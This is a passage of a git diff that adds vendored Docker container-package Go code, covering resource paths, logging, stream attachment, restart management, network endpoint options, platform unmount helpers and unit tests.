+// Only use this method to safely access the container's `container.json` or
+// other metadata files. If in doubt, use container.GetResourcePath.
+//
+// NOTE: The returned path is *only* safely scoped inside the container's root
+//       if no component of the returned path changes (such as a component
+//       symlinking to a different path) between using this method and using the
+//       path. See symlink.FollowSymlinkInScope for more details.
+func (container *Container) GetRootResourcePath(path string) (string, error) {
+	// IMPORTANT - These are paths on the OS where the daemon is running, hence
+	// any filepath operations must be done in an OS agnostic way.
+	cleanPath := filepath.Join(string(os.PathSeparator), path)
+	return symlink.FollowSymlinkInScope(filepath.Join(container.Root, cleanPath), container.Root)
+}
+
+// ExitOnNext signals to the monitor that it should not restart the container
+// after we send the kill signal.
+func (container *Container) ExitOnNext() {
+	container.RestartManager().Cancel()
+}
+
+// HostConfigPath returns the path to the container's JSON hostconfig
+func (container *Container) HostConfigPath() (string, error) {
+	return container.GetRootResourcePath("hostconfig.json")
+}
+
+// ConfigPath returns the path to the container's JSON config
+func (container *Container) ConfigPath() (string, error) {
+	return container.GetRootResourcePath(configFileName)
+}
+
+// CheckpointDir returns the directory checkpoints are stored in
+func (container *Container) CheckpointDir() string {
+	return filepath.Join(container.Root, "checkpoints")
+}
+
+// StartLogger starts a new logger driver for the container.
+func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) {
+	c, err := logger.GetLogDriver(cfg.Type)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to get logging factory: %v", err)
+	}
+	ctx := logger.Context{
+		Config:              cfg.Config,
+		ContainerID:         container.ID,
+		ContainerName:       container.Name,
+		ContainerEntrypoint: container.Path,
+		ContainerArgs:       container.Args,
+		ContainerImageID:    container.ImageID.String(),
+		ContainerImageName:  container.Config.Image,
+		ContainerCreated:    container.Created,
+		ContainerEnv:        container.Config.Env,
+		ContainerLabels:     container.Config.Labels,
+		DaemonName:          "docker",
+	}
+
+	// Set logging file for "json-logger"
+	if cfg.Type == jsonfilelog.Name {
+		ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID))
+		if err != nil {
+			return nil, err
+		}
+	}
+	return c(ctx)
+}
+
+// GetProcessLabel returns the process label for the container.
+func (container *Container) GetProcessLabel() string {
+	// even if we have a process label return "" if we are running
+	// in privileged mode
+	if container.HostConfig.Privileged {
+		return ""
+	}
+	return container.ProcessLabel
+}
+
+// GetMountLabel returns the mounting label for the container.
+// This label is empty if the container is privileged.
+func (container *Container) GetMountLabel() string {
+	return container.MountLabel
+}
+
+// GetExecIDs returns the list of exec commands running on the container.
+func (container *Container) GetExecIDs() []string {
+	return container.ExecCommands.List()
+}
+
+// Attach connects to the container's TTY, delegating to standard
+// streams or websockets depending on the configuration.
+func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error {
+	ctx := container.InitAttachContext()
+	return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys)
+}
+
+// AttachStreams connects streams to a TTY.
+// Used by exec too. Should this move somewhere else?
+func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error {
+	var (
+		cStdout, cStderr io.ReadCloser
+		cStdin           io.WriteCloser
+		wg               sync.WaitGroup
+		errors           = make(chan error, 3)
+	)
+
+	if stdin != nil && openStdin {
+		cStdin = streamConfig.StdinPipe()
+		wg.Add(1)
+	}
+
+	if stdout != nil {
+		cStdout = streamConfig.StdoutPipe()
+		wg.Add(1)
+	}
+
+	if stderr != nil {
+		cStderr = streamConfig.StderrPipe()
+		wg.Add(1)
+	}
+
+	// Connect stdin of container to the http conn.
+	go func() {
+		if stdin == nil || !openStdin {
+			return
+		}
+		logrus.Debug("attach: stdin: begin")
+
+		var err error
+		if tty {
+			_, err = copyEscapable(cStdin, stdin, keys)
+		} else {
+			_, err = io.Copy(cStdin, stdin)
+		}
+		if err == io.ErrClosedPipe {
+			err = nil
+		}
+		if err != nil {
+			logrus.Errorf("attach: stdin: %s", err)
+			errors <- err
+		}
+		if stdinOnce && !tty {
+			cStdin.Close()
+		} else {
+			// No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr
+			if cStdout != nil {
+				cStdout.Close()
+			}
+			if cStderr != nil {
+				cStderr.Close()
+			}
+		}
+		logrus.Debug("attach: stdin: end")
+		wg.Done()
+	}()
+
+	attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) {
+		if stream == nil {
+			return
+		}
+
+		logrus.Debugf("attach: %s: begin", name)
+		_, err := io.Copy(stream, streamPipe)
+		if err == io.ErrClosedPipe {
+			err = nil
+		}
+		if err != nil {
+			logrus.Errorf("attach: %s: %v", name, err)
+			errors <- err
+		}
+		// Make sure stdin gets closed
+		if stdin != nil {
+			stdin.Close()
+		}
+		streamPipe.Close()
+		logrus.Debugf("attach: %s: end", name)
+		wg.Done()
+	}
+
+	go attachStream("stdout", stdout, cStdout)
+	go attachStream("stderr", stderr, cStderr)
+
+	return promise.Go(func() error {
+		done := make(chan struct{})
+		go func() {
+			wg.Wait()
+			close(done)
+		}()
+		select {
+		case <-done:
+		case <-ctx.Done():
+			// close all pipes
+			if cStdin != nil {
+				cStdin.Close()
+			}
+			if cStdout != nil {
+				cStdout.Close()
+			}
+			if cStderr != nil {
+				cStderr.Close()
+			}
+			<-done
+		}
+		close(errors)
+		for err := range errors {
+			if err != nil {
+				return err
+			}
+		}
+		return nil
+	})
+}
+
+// Code c/c from io.Copy() modified to handle escape sequence
+func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) {
+	if len(keys) == 0 {
+		// Default keys : ctrl-p ctrl-q
+		keys = []byte{16, 17}
+	}
+	buf := make([]byte, 32*1024)
+	for {
+		nr, er := src.Read(buf)
+		if nr > 0 {
+			// ---- Docker addition
+			preservBuf := []byte{}
+			for i, key := range keys {
+				preservBuf = append(preservBuf, buf[0:nr]...)
+				if nr != 1 || buf[0] != key {
+					break
+				}
+				if i == len(keys)-1 {
+					src.Close()
+					return 0, DetachError{}
+				}
+				nr, er = src.Read(buf)
+			}
+			var nw int
+			var ew error
+			if len(preservBuf) > 0 {
+				nw, ew = dst.Write(preservBuf)
+				nr = len(preservBuf)
+			} else {
+				// ---- End of docker
+				nw, ew = dst.Write(buf[0:nr])
+			}
+			if nw > 0 {
+				written += int64(nw)
+			}
+			if ew != nil {
+				err = ew
+				break
+			}
+			if nr != nw {
+				err = io.ErrShortWrite
+				break
+			}
+		}
+		if er == io.EOF {
+			break
+		}
+		if er != nil {
+			err = er
+			break
+		}
+	}
+	return written, err
+}
+
+// ShouldRestart decides whether the daemon should restart the container or not.
+// This is based on the container's restart policy.
+func (container *Container) ShouldRestart() bool {
+	shouldRestart, _, _ := container.RestartManager().ShouldRestart(uint32(container.ExitCode()), container.HasBeenManuallyStopped, container.FinishedAt.Sub(container.StartedAt))
+	return shouldRestart
+}
+
+// AddMountPointWithVolume adds a new mount point configured with a volume to the container.
+func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) {
+	container.MountPoints[destination] = &volume.MountPoint{
+		Type:        mounttypes.TypeVolume,
+		Name:        vol.Name(),
+		Driver:      vol.DriverName(),
+		Destination: destination,
+		RW:          rw,
+		Volume:      vol,
+		CopyData:    volume.DefaultCopyMode,
+	}
+}
+
+// UnmountVolumes unmounts all volumes
+func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error {
+	var errors []string
+	for _, volumeMount := range container.MountPoints {
+		// Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted
+		// TODO(cpuguyh83): there should be a better way to handle this
+		if volumeMount.Volume != nil && volumeMount.ID != "" {
+			if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil {
+				errors = append(errors, err.Error())
+				continue
+			}
+			volumeMount.ID = ""
+
+			attributes := map[string]string{
+				"driver":    volumeMount.Volume.DriverName(),
+				"container": container.ID,
+			}
+			volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes)
+		}
+	}
+	if len(errors) > 0 {
+		return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; "))
+	}
+	return nil
+}
+
+// IsDestinationMounted checks whether a path is mounted on the container or not.
+func (container *Container) IsDestinationMounted(destination string) bool {
+	return container.MountPoints[destination] != nil
+}
+
+// StopSignal returns the signal used to stop the container.
+func (container *Container) StopSignal() int {
+	var stopSignal syscall.Signal
+	if container.Config.StopSignal != "" {
+		stopSignal, _ = signal.ParseSignal(container.Config.StopSignal)
+	}
+
+	if int(stopSignal) == 0 {
+		stopSignal, _ = signal.ParseSignal(signal.DefaultStopSignal)
+	}
+	return int(stopSignal)
+}
+
+// StopTimeout returns the timeout (in seconds) used to stop the container.
+func (container *Container) StopTimeout() int {
+	if container.Config.StopTimeout != nil {
+		return *container.Config.StopTimeout
+	}
+	return DefaultStopTimeout
+}
+
+// InitDNSHostConfig ensures that the dns fields are never nil.
+// New containers don't ever have those fields nil,
+// but pre created containers can still have those nil values.
+// The non-recommended host configuration in the start api can
+// make these fields nil again, this corrects that issue until
+// we remove that behavior for good.
+// See https://github.com/docker/docker/pull/17779
+// for a more detailed explanation on why we don't want that.
+func (container *Container) InitDNSHostConfig() {
+	container.Lock()
+	defer container.Unlock()
+	if container.HostConfig.DNS == nil {
+		container.HostConfig.DNS = make([]string, 0)
+	}
+
+	if container.HostConfig.DNSSearch == nil {
+		container.HostConfig.DNSSearch = make([]string, 0)
+	}
+
+	if container.HostConfig.DNSOptions == nil {
+		container.HostConfig.DNSOptions = make([]string, 0)
+	}
+}
+
+// GetEndpointInNetwork returns the container's endpoint to the provided network.
+func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) {
+	endpointName := strings.TrimPrefix(container.Name, "/")
+	return n.EndpointByName(endpointName)
+}
+
+func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error {
+	if ep == nil {
+		return errInvalidEndpoint
+	}
+
+	networkSettings := container.NetworkSettings
+	if networkSettings == nil {
+		return errInvalidNetwork
+	}
+
+	if len(networkSettings.Ports) == 0 {
+		pm, err := getEndpointPortMapInfo(ep)
+		if err != nil {
+			return err
+		}
+		networkSettings.Ports = pm
+	}
+	return nil
+}
+
+func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) {
+	pm := nat.PortMap{}
+	driverInfo, err := ep.DriverInfo()
+	if err != nil {
+		return pm, err
+	}
+
+	if driverInfo == nil {
+		// It is not an error for epInfo to be nil
+		return pm, nil
+	}
+
+	if expData, ok := driverInfo[netlabel.ExposedPorts]; ok {
+		if exposedPorts, ok := expData.([]types.TransportPort); ok {
+			for _, tp := range exposedPorts {
+				natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port)))
+				if err != nil {
+					return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err)
+				}
+				pm[natPort] = nil
+			}
+		}
+	}
+
+	mapData, ok := driverInfo[netlabel.PortMap]
+	if !ok {
+		return pm, nil
+	}
+
+	if portMapping, ok := mapData.([]types.PortBinding); ok {
+		for _, pp := range portMapping {
+			natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port)))
+			if err != nil {
+				return pm, err
+			}
+			natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))}
+			pm[natPort] = append(pm[natPort], natBndg)
+		}
+	}
+
+	return pm, nil
+}
+
+// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox
+func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap {
+	pm := nat.PortMap{}
+	if sb == nil {
+		return pm
+	}
+
+	for _, ep := range sb.Endpoints() {
+		pm, _ = getEndpointPortMapInfo(ep)
+		if len(pm) > 0 {
+			break
+		}
+	}
+	return pm
+}
+
+// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint.
+func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error {
+	if ep == nil {
+		return errInvalidEndpoint
+	}
+
+	networkSettings := container.NetworkSettings
+	if networkSettings == nil {
+		return errInvalidNetwork
+	}
+
+	epInfo := ep.Info()
+	if epInfo == nil {
+		// It is not an error to get an empty endpoint info
+		return nil
+	}
+
+	if _, ok := networkSettings.Networks[n.Name()]; !ok {
+		networkSettings.Networks[n.Name()] = &network.EndpointSettings{
+			EndpointSettings: &networktypes.EndpointSettings{},
+		}
+	}
+	networkSettings.Networks[n.Name()].NetworkID = n.ID()
+	networkSettings.Networks[n.Name()].EndpointID = ep.ID()
+
+	iface := epInfo.Iface()
+	if iface == nil {
+		return nil
+	}
+
+	if iface.MacAddress() != nil {
+		networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String()
+	}
+
+	if iface.Address() != nil {
+		ones, _ := iface.Address().Mask.Size()
+		networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String()
+		networkSettings.Networks[n.Name()].IPPrefixLen = ones
+	}
+
+	if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil {
+		onesv6, _ := iface.AddressIPv6().Mask.Size()
+		networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String()
+		networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6
+	}
+
+	return nil
+}
+
+// UpdateJoinInfo updates network settings when container joins network n with endpoint ep.
+func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error {
+	if err := container.buildPortMapInfo(ep); err != nil {
+		return err
+	}
+
+	epInfo := ep.Info()
+	if epInfo == nil {
+		// It is not an error to get an empty endpoint info
+		return nil
+	}
+	if epInfo.Gateway() != nil {
+		container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String()
+	}
+	if epInfo.GatewayIPv6().To16() != nil {
+		container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String()
+	}
+
+	return nil
+}
+
+// UpdateSandboxNetworkSettings updates the sandbox ID and Key.
+func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error {
+	container.NetworkSettings.SandboxID = sb.ID()
+	container.NetworkSettings.SandboxKey = sb.Key()
+	return nil
+}
+
+// BuildJoinOptions builds endpoint Join options from a given network.
+func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) {
+	var joinOptions []libnetwork.EndpointOption
+	if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok {
+		for _, str := range epConfig.Links {
+			name, alias, err := runconfigopts.ParseLink(str)
+			if err != nil {
+				return nil, err
+			}
+			joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias))
+		}
+	}
+	return joinOptions, nil
+}
+
+// BuildCreateEndpointOptions builds endpoint options from a given network.
+func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) {
+	var (
+		bindings      = make(nat.PortMap)
+		pbList        []types.PortBinding
+		exposeList    []types.TransportPort
+		createOptions []libnetwork.EndpointOption
+	)
+
+	defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName()
+
+	if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) ||
+		container.NetworkSettings.IsAnonymousEndpoint {
+		createOptions = append(createOptions, libnetwork.CreateOptionAnonymous())
+	}
+
+	if epConfig != nil {
+		ipam := epConfig.IPAMConfig
+		if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) {
+			var ipList []net.IP
+			for _, ips := range ipam.LinkLocalIPs {
+				if ip := net.ParseIP(ips); ip != nil {
+					ipList = append(ipList, ip)
+				}
+			}
+			createOptions = append(createOptions,
+				libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil))
+		}
+
+		for _, alias := range epConfig.Aliases {
+			createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias))
+		}
+	}
+
+	if container.NetworkSettings.Service != nil {
+		svcCfg := container.NetworkSettings.Service
+
+		var vip string
+		if svcCfg.VirtualAddresses[n.ID()] != nil {
+			vip = svcCfg.VirtualAddresses[n.ID()].IPv4
+		}
+
+		var portConfigs []*libnetwork.PortConfig
+		for _, portConfig := range svcCfg.ExposedPorts {
+			portConfigs = append(portConfigs, &libnetwork.PortConfig{
+				Name:          portConfig.Name,
+				Protocol:      libnetwork.PortConfig_Protocol(portConfig.Protocol),
+				TargetPort:    portConfig.TargetPort,
+				PublishedPort: portConfig.PublishedPort,
+			})
+		}
+
+		createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()]))
+	}
+
+	if !containertypes.NetworkMode(n.Name()).IsUserDefined() {
+		createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution())
+	}
+
+	// configs that are applicable only for the endpoint in the network
+	// to which container was connected to on docker run.
+	// Ideally all these network-specific endpoint configurations must be moved under
+	// container.NetworkSettings.Networks[n.Name()]
+	if n.Name() == container.HostConfig.NetworkMode.NetworkName() ||
+		(n.Name() == defaultNetName && container.HostConfig.NetworkMode.IsDefault()) {
+		if container.Config.MacAddress != "" {
+			mac, err := net.ParseMAC(container.Config.MacAddress)
+			if err != nil {
+				return nil, err
+			}
+
+			genericOption := options.Generic{
+				netlabel.MacAddress: mac,
+			}
+
+			createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption))
+		}
+	}
+
+	// Port-mapping rules belong to the container & applicable only to non-internal networks
+	portmaps := GetSandboxPortMapInfo(sb)
+	if n.Info().Internal() || len(portmaps) > 0 {
+		return createOptions, nil
+	}
+
+	if container.HostConfig.PortBindings != nil {
+		for p, b := range container.HostConfig.PortBindings {
+			bindings[p] = []nat.PortBinding{}
+			for _, bb := range b {
+				bindings[p] = append(bindings[p], nat.PortBinding{
+					HostIP:   bb.HostIP,
+					HostPort: bb.HostPort,
+				})
+			}
+		}
+	}
+
+	portSpecs := container.Config.ExposedPorts
+	ports := make([]nat.Port, len(portSpecs))
+	var i int
+	for p := range portSpecs {
+		ports[i] = p
+		i++
+	}
+	nat.SortPortMap(ports, bindings)
+	for _, port := range ports {
+		expose := types.TransportPort{}
+		expose.Proto = types.ParseProtocol(port.Proto())
+		expose.Port = uint16(port.Int())
+		exposeList = append(exposeList, expose)
+
+		pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto}
+		binding := bindings[port]
+		for i := 0; i < len(binding); i++ {
+			pbCopy := pb.GetCopy()
+			newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort))
+			var portStart, portEnd int
+			if err == nil {
+				portStart, portEnd, err = newP.Range()
+			}
+			if err != nil {
+				return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err)
+			}
+			pbCopy.HostPort = uint16(portStart)
+			pbCopy.HostPortEnd = uint16(portEnd)
+			pbCopy.HostIP = net.ParseIP(binding[i].HostIP)
+			pbList = append(pbList, pbCopy)
+		}
+
+		if container.HostConfig.PublishAllPorts && len(binding) == 0 {
+			pbList = append(pbList, pb)
+		}
+	}
+
+	var dns []string
+
+	if len(container.HostConfig.DNS) > 0 {
+		dns = container.HostConfig.DNS
+	} else if len(daemonDNS) > 0 {
+		dns = daemonDNS
+	}
+
+	if len(dns) > 0 {
+		createOptions = append(createOptions,
+			libnetwork.CreateOptionDNS(dns))
+	}
+
+	createOptions = append(createOptions,
+		libnetwork.CreateOptionPortMapping(pbList),
+		libnetwork.CreateOptionExposedPorts(exposeList))
+
+	return createOptions, nil
+}
+
+// UpdateMonitor updates monitor configure for running container
+func (container *Container) UpdateMonitor(restartPolicy containertypes.RestartPolicy) {
+	type policySetter interface {
+		SetPolicy(containertypes.RestartPolicy)
+	}
+
+	if rm, ok := container.RestartManager().(policySetter); ok {
+		rm.SetPolicy(restartPolicy)
+	}
+}
+
+// FullHostname returns hostname and optional domain appended to it.
+func (container *Container) FullHostname() string {
+	fullHostname := container.Config.Hostname
+	if container.Config.Domainname != "" {
+		fullHostname = fmt.Sprintf("%s.%s", fullHostname, container.Config.Domainname)
+	}
+	return fullHostname
+}
+
+// RestartManager returns the current restartmanager instance connected to container.
+func (container *Container) RestartManager() restartmanager.RestartManager {
+	if container.restartManager == nil {
+		container.restartManager = restartmanager.New(container.HostConfig.RestartPolicy, container.RestartCount)
+	}
+	return container.restartManager
+}
+
+// ResetRestartManager initializes new restartmanager based on container config
+func (container *Container) ResetRestartManager(resetCount bool) {
+	if container.restartManager != nil {
+		container.restartManager.Cancel()
+	}
+	if resetCount {
+		container.RestartCount = 0
+	}
+	container.restartManager = nil
+}
+
+type attachContext struct {
+	ctx    context.Context
+	cancel context.CancelFunc
+	mu     sync.Mutex
+}
+
+// InitAttachContext initializes or returns existing context for attach calls to
+// track container liveness.
+func (container *Container) InitAttachContext() context.Context {
+	container.attachContext.mu.Lock()
+	defer container.attachContext.mu.Unlock()
+	if container.attachContext.ctx == nil {
+		container.attachContext.ctx, container.attachContext.cancel = context.WithCancel(context.Background())
+	}
+	return container.attachContext.ctx
+}
+
+// CancelAttachContext cancels attach context. All attach calls should detach
+// after this call.
+func (container *Container) CancelAttachContext() {
+	container.attachContext.mu.Lock()
+	if container.attachContext.ctx != nil {
+		container.attachContext.cancel()
+		container.attachContext.ctx = nil
+	}
+	container.attachContext.mu.Unlock()
+}
+
+func (container *Container) startLogging() error {
+	if container.HostConfig.LogConfig.Type == "none" {
+		return nil // do not start logging routines
+	}
+
+	l, err := container.StartLogger(container.HostConfig.LogConfig)
+	if err != nil {
+		return fmt.Errorf("Failed to initialize logging driver: %v", err)
+	}
+
+	copier := logger.NewCopier(map[string]io.Reader{"stdout": container.StdoutPipe(), "stderr": container.StderrPipe()}, l)
+	container.LogCopier = copier
+	copier.Run()
+	container.LogDriver = l
+
+	// set LogPath field only for json-file logdriver
+	if jl, ok := l.(*jsonfilelog.JSONFileLogger); ok {
+		container.LogPath = jl.LogPath()
+	}
+
+	return nil
+}
+
+// StdinPipe gets the stdin stream of the container
+func (container *Container) StdinPipe() io.WriteCloser {
+	return container.StreamConfig.StdinPipe()
+}
+
+// StdoutPipe gets the stdout stream of the container
+func (container *Container) StdoutPipe() io.ReadCloser {
+	return container.StreamConfig.StdoutPipe()
+}
+
+// StderrPipe gets the stderr stream of the container
+func (container *Container) StderrPipe() io.ReadCloser {
+	return container.StreamConfig.StderrPipe()
+}
+
+// CloseStreams closes the container's stdio streams
+func (container *Container) CloseStreams() error {
+	return container.StreamConfig.CloseStreams()
+}
+
+// InitializeStdio is called by libcontainerd to connect the stdio.
+func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error {
+	if err := container.startLogging(); err != nil {
+		container.Reset(false)
+		return err
+	}
+
+	container.StreamConfig.CopyToPipe(iop)
+
+	if container.StreamConfig.Stdin() == nil && !container.Config.Tty {
+		if iop.Stdin != nil {
+			if err := iop.Stdin.Close(); err != nil {
+				logrus.Warnf("error closing stdin: %+v", err)
+			}
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go
new file mode 100644
index 0000000000..4d4c16b563
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_linux.go
@@ -0,0 +1,9 @@
+package container
+
+import (
+	"golang.org/x/sys/unix"
+)
+
+func detachMounted(path string) error {
+	return unix.Unmount(path, unix.MNT_DETACH)
+}
diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go
new file mode 100644
index 0000000000..f65653e992
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_notlinux.go
@@ -0,0 +1,23 @@
+// +build solaris freebsd
+
+package container
+
+import (
+	"golang.org/x/sys/unix"
+)
+
+func detachMounted(path string) error {
+	//Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature.
+	// Therefore there are separate definitions for this.
+	return unix.Unmount(path, 0)
+}
+
+// SecretMount returns the mount for the secret path
+func (container *Container) SecretMount() *Mount {
+	return nil
+}
+
+// UnmountSecrets unmounts the fs for secrets
+func (container *Container) UnmountSecrets() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go
new file mode 100644
index 0000000000..f301f25bbe
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_unit_test.go
@@ -0,0 +1,60 @@
+package container
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/signal"
+)
+
+func TestContainerStopSignal(t *testing.T) {
+	c := &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{},
+		},
+	}
+
+	def, err := signal.ParseSignal(signal.DefaultStopSignal)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	s := c.StopSignal()
+	if s != int(def) {
+		t.Fatalf("Expected %v, got %v", def, s)
+	}
+
+	c = &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{StopSignal: "SIGKILL"},
+		},
+	}
+	s = c.StopSignal()
+	if s != 9 {
+		t.Fatalf("Expected 9, got %v", s)
+	}
+}
+
+func TestContainerStopTimeout(t *testing.T) {
+	c := &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{},
+		},
+	}
+
+	s := c.StopTimeout()
+	if s != DefaultStopTimeout {
+		t.Fatalf("Expected %v, got %v", DefaultStopTimeout, s)
+	}
+
+	stopTimeout := 15
+	c = &Container{
+		CommonContainer: CommonContainer{
+			Config: &container.Config{StopTimeout: &stopTimeout},
+		},
+	}
+	s = c.StopSignal()
+	if s != 15 {
+		t.Fatalf("Expected 15, got %v", s)
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go
new file mode 100644
index 0000000000..4f6b795d2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container_unix.go
@@ -0,0 +1,448 @@
+// +build linux freebsd solaris
+
+package container
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/utils"
+	"github.com/docker/docker/volume"
+	"github.com/opencontainers/runc/libcontainer/label"
+	"golang.org/x/sys/unix"
+)
+
+const (
+	// DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container
+	DefaultSHMSize           int64 = 67108864
+	containerSecretMountPath       = "/run/secrets"
+)
+
+// Container holds the fields specific to unixen implementations.
+// See CommonContainer for standard fields common to all containers.
+type Container struct {
+	CommonContainer
+
+	// Fields below here are platform specific.
+	AppArmorProfile string
+	HostnamePath    string
+	HostsPath       string
+	ShmPath         string
+	ResolvConfPath  string
+	SeccompProfile  string
+	NoNewPrivileges bool
+}
+
+// ExitStatus provides exit reasons for a container.
+type ExitStatus struct {
+	// The exit code with which the container exited.
+	ExitCode int
+
+	// Whether the container encountered an OOM.
+	OOMKilled bool
+}
+
+// CreateDaemonEnvironment returns the list of all environment variables given the list of
+// environment variables related to links.
+// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM.
+// The defaults set here do not override the values in container.Config.Env
+func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string {
+	// Setup environment
+	env := []string{
+		"PATH=" + system.DefaultPathEnv,
+		"HOSTNAME=" + container.Config.Hostname,
+	}
+	if tty {
+		env = append(env, "TERM=xterm")
+	}
+	env = append(env, linkedEnv...)
+	// because the env on the container can override certain default values
+	// we need to replace the 'env' keys where they match and append anything
+	// else.
+	env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env)
+	return env
+}
+
+// TrySetNetworkMount attempts to set the network mounts given a provided destination and
+// the path to use for it; return true if the given destination was a network mount file
+func (container *Container) TrySetNetworkMount(destination string, path string) bool {
+	if destination == "/etc/resolv.conf" {
+		container.ResolvConfPath = path
+		return true
+	}
+	if destination == "/etc/hostname" {
+		container.HostnamePath = path
+		return true
+	}
+	if destination == "/etc/hosts" {
+		container.HostsPath = path
+		return true
+	}
+
+	return false
+}
+
+// BuildHostnameFile writes the container's hostname file.
+func (container *Container) BuildHostnameFile() error {
+	hostnamePath, err := container.GetRootResourcePath("hostname")
+	if err != nil {
+		return err
+	}
+	container.HostnamePath = hostnamePath
+	return ioutil.WriteFile(container.HostnamePath, []byte(container.Config.Hostname+"\n"), 0644)
+}
+
+// NetworkMounts returns the list of network mounts.
+func (container *Container) NetworkMounts() []Mount {
+	var mounts []Mount
+	shared := container.HostConfig.NetworkMode.IsContainer()
+	if container.ResolvConfPath != "" {
+		if _, err := os.Stat(container.ResolvConfPath); err != nil {
+			logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err)
+		} else {
+			if !container.HasMountFor("/etc/resolv.conf") {
+				label.Relabel(container.ResolvConfPath, container.MountLabel, shared)
+			}
+			writable := !container.HostConfig.ReadonlyRootfs
+			if m, exists := container.MountPoints["/etc/resolv.conf"]; exists {
+				writable = m.RW
+			}
+			mounts = append(mounts, Mount{
+				Source:      container.ResolvConfPath,
+				Destination: "/etc/resolv.conf",
+				Writable:    writable,
+				Propagation: string(volume.DefaultPropagationMode),
